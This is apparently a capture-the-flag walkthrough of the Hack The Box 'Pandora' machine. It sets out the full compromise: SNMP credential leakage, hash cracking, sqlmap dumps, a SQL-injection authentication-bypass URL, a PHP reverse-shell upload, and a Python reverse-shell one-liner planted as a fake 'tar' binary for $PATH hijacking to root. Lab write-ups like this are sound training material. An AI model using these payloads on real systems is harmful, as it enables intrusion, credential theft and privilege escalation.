Pandora - Hack The Box
Pandora is an easy-rated Linux machine from Hack The Box. On this machine we’re forced to think outside of the box, or even inside to be precise. We get a foothold almost instantly and from there need to enumerate the local services and use tunneling to exploit them, which I find unique for an easy-rated machine. The $PATH to root has a nice little quirk that took me off guard, and in the end forced me to learn something valuable that I’ll take with me for future assessments. Was it fun though? Yes and no, it was decent and will keep you busy for a few hours.
USER
Step 1
nmap:
[root:/git/htb/pandora]# nmap -p- 10.10.11.136
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
[root:/git/htb/pandora]# nmap -Pn -n -sCV -p22,80 10.10.11.136
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[root:/git/htb/pandora]# nmap -sU --top-port=20 --open 10.10.11.136
PORT STATE SERVICE
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp open snmp
520/udp open|filtered route
4500/udp open|filtered nat-t-ike
dirb:
==> DIRECTORY: http://10.10.11.136/assets/
+ http://10.10.11.136/index.html (CODE:200|SIZE:33560)
+ http://10.10.11.136/server-status (CODE:403|SIZE:277)
nikto:
+ Server: Apache/2.4.41 (Ubuntu)
snmp-check:
[root:/git/htb/pandora]# snmp-check 10.10.11.136
[... snip ...]
[+] Try to connect to 10.10.11.136:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.10.11.136
Hostname : pandora
Description : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
Contact : Daniel
[... snip ...]
[*] Processes:
846 runnable sh /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
1118 runnable host_check /usr/bin/host_check -u daniel -p HotelBabylon23
Found credentials: daniel:HotelBabylon23
Step 2
Login with SSH and the found credentials and begin enumerate the box internally. Keep in mind that we could see on the webserver /assets/scss
that there are probably a blog and login page, these could be used as potential escalation vectors.
daniel@pandora:/var/www/pandora/pandora_console$ cat * | grep -i admin
[... snip ...]
INSERT INTO `tusuario` (`id_user`, `fullname`, `firstname`, `lastname`, `middlename`, `password`, `comments`, `last_connect`, `registered`, `email`, `phone`, `is_admin`, `language`, `block_size`, `section`, `data_section`, `metaconsole_access`) VALUES
('admin', 'Pandora', 'Pandora', 'Admin', '', '1da7ee7d45b96d0e1f45ee4ee23da560', 'Admin Pandora', 1232642121, 0, 'admin@example.com', '555-555-5555', 1, 'default', 0, 'Default', '', 'advanced');
[root:/git/htb/pandora]# hashcat -a0 -m0 passwd.hash /usr/share/wordlists/rockyou.txt
1da7ee7d45b96d0e1f45ee4ee23da560:pandora
Session..........: hashcat
Status...........: Cracked
Setup a SSH Tunnel to access the internal webserver, try cracked credentials admin:pandora
to login.
[root:/git/htb/pandora]# ssh -L 80:localhost:80 daniel@pandora.htb
Unfortunatley the login fails.
On the bottom of the page we find version v7.0NG.742_FIX_PERL2020, using searchsploit we find three interesting exploits - however all three are authenticated.
[root:/git/htb/pandora]# searchsploit pandora
Pandora 7.0NG - Remote Code Execution | php/webapps/47898.py
Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution | php/webapps/48280.py
PANDORAFMS 7.0 - Authenticated Remote Code Execution | php/webapps/48064.py
Step 3
Googling Pandora FMS 742 Auth Bypass
we find this post. There is a SQL Injection vulnerability in chart_generator.php leading to an authentication bypass - perfect!
[root:/git/htb/pandora]# sqlmap -u http://localhost/pandora_console/include/chart_generator.php\?session_id\=1 --dbms=mysql -D pandora --dump
[... snip ...]
[16:01:22] [INFO] retrieved: 'tpassword_history'
[root:/git/htb/pandora]# sqlmap -u http://localhost/pandora_console/include/chart_generator.php\?session_id\=1 --dbms=mysql -D pandora -T tpassword_history --dump
Database: pandora
Table: tpassword_history
[2 entries]
+---------+---------+---------------------+----------------------------------+---------------------+
| id_pass | id_user | date_end | password | date_begin |
+---------+---------+---------------------+----------------------------------+---------------------+
| 1 | matt | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2 | daniel | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
+---------+---------+---------------------+----------------------------------+---------------------+
I am not able to crack the password for matt however. Googling around for CVE-2021-32099 poc I come across this one-liner.
Change it to fit our needs, visit the URL, update the login promt and we’ve bypassed the login as admin.
http://localhost/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO
Go to Admin tools > File manager > Upload file (top right corner), and upload a php reverse shell.
Trigger the reverse by visiting http://localhost/pandora_console/images/rev.php
.
[root:/git/htb/pandora]# nc -lvnp 4488 (master✱)
listening on [any] 4488 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.136] 49484
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
14:24:05 up 4:32, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.14.6 09:53 1:33m 6:12 0.92s -bash
daniel pts/1 10.10.14.11 12:57 41:33 0.28s 0.28s -bash
daniel pts/2 10.10.14.11 13:19 1:04m 0.03s 0.03s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: cant access tty; job control turned off
$ hostname && id
pandora
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ cat /home/matt/user.txt
a1d9ef4581130dd7dc6852315d356945
ROOT
Step 1
Trying the usual sudo -l
fails, so enumerate the box manually and/or with linpeas.
matt@pandora:/dev/shm$ ./linpeas.sh
[... snip ...]
-rwsr-x--- 1 root matt 17K Dec 3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)
Trying to execute the binary fails:
matt@pandora:/dev/shm$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
It seems like the program want’s to use tar
on /root/.backup/pandora-backup.tar.gz
. Since this is an easy box, maybe this is exploitable using $PATH
.
Find where tar
is located:
matt@pandora:/$ which tar
/usr/bin/tar
OR
matt@pandora:/$ find / -name "tar" -type f 2>&1 | grep -v "Permission denied"
/usr/bin/tar
Create a malicious tar-file to be executed:
matt@pandora:/dev/shm$ cat tar
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",4499));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
matt@pandora:/dev/shm$ chmod +x tar
NOTE: It would probably suffice just having /bin/bash
in the malicious tar-binary.
Change the PATH and run pandora_backup
to trigger the reverse shell.
matt@pandora:/dev/shm$ export PATH=/dev/shm:$PATH
matt@pandora:/dev/shm$ sudo /usr/bin/pandora_backup
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
Executing the binary without sudo
just gives us a shell as matt again. Something is weird with the suid bit.
Step 2
Trying to understand why we get Operation not permitted
when running commands as sudo, I came across a writeup of OpenAdmin where the writer experienced the same issue. To solve it he generated a new key pair and logged in via ssh.
To understand exactly why this was an issue, I spoke with the box creator after completing this box and got this explanation:
”.. its due to apache’s mpm_itk module, it sandboxes the namespace and disables SUID as a form of protection when running apache as another user - https://lists.debian.org/debian-apache/2015/11/msg00022.html”
[root:/git/htb/pandora]# ssh-keygen -t rsa -b 4096 -f matt-id_rsa
[root:/git/htb/pandora]# cat matt-id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC2WZVQuP8WGh3bumMoXGRiVzxWLBWZDR7x1cKfIk59S1ZL8RJcw3jxxOeJ8McF5Bjvet/xtCm9kPbEsIybA2HCK5+H77d+R97x7Yr3bvWd+OzB0Xvw/jsKlDHgiYBQAFKNZAwBKfHu7CCBn/VhsnCmXDizkH3UzvaB638vFlE+aWruHS4Gqge+hWBGkVxVIDeHjb1hNrmUz/QuTivuySqvsTg1B6IONWvS//+jCLsEteyV5aef24agwDVHAM15ILfLGxYRVKh5AjnZuSt090Sy+9ehapJUo2DBTvC8KJjY5pDZ68mFyCxEHRPaicM97ZUsQxAjSGpHoLlvVw9eNbPPYZHOIUs0bc8a50hAK56Gq2MgMOerNe+T0g3/HxMVZdKDwOaVOi2J/PuYTOy9tZkIZKyRiEsZIBFA4w1Mwjp0GIa4hZ1lnPpLsCrG/iFB2xhhfSg46SswAGk38bEFI8a1pnQxqBf+NCVmBil7A4j2ktuMmcLRWBOChBrUb01s348Hf+yNDBuYr7U4QyRz4xBQHg6jV7ZkyBh2vcEBy3YlWYq4YN7Cc2a4cExKX8n0NxBv5C23rhmjg/DEZiGR47jrXGtmGJhMgwJjjqW5vqXqjcYOn778eZ3GpRDML/BmRjGAxPL4aIqju/MD9z66eET79Jam1wzMw4bwWGH81XZAZw==
matt@pandora:/dev/shm$ mkdir /home/matt/.ssh
matt@pandora:/dev/shm$ chmod 700 /home/matt/.ssh/
matt@pandora:/dev/shm$ vim /home/matt/.ssh/authorized_keys
matt@pandora:/dev/shm$ chmod 600 /home/matt/.ssh/authorized_keys
matt@pandora:/dev/shm$ ls -al /home/matt/.ssh/
total 12
drwxrwxrwx 2 matt matt 4096 Jan 26 16:29 .
drwxr-xr-x 4 matt matt 4096 Jan 26 16:28 ..
-rw------- 1 matt matt 725 Jan 26 16:29 authorized_keys
[root:/git/htb/pandora]# ssh matt@pandora.htb -i matt-id_rsa
matt@pandora:~$
Now, retrace our steps and change the $PATH
and run our malicious tar
to get root shell.
matt@pandora:/dev/shm$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/dev/shm$ export PATH=/dev/shm:$PATH
matt@pandora:/dev/shm$ cat tar
/bin/bash
matt@pandora:/dev/shm$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/dev/shm# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:/dev/shm# cat /root/root.txt
b7604e0c75f6b75c43f2f0a3de0e9b31
root@pandora:/dev/shm# cat /etc/shadow
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9
matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP
daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7:::
References
Pandora FMS 742 Auth Bypass: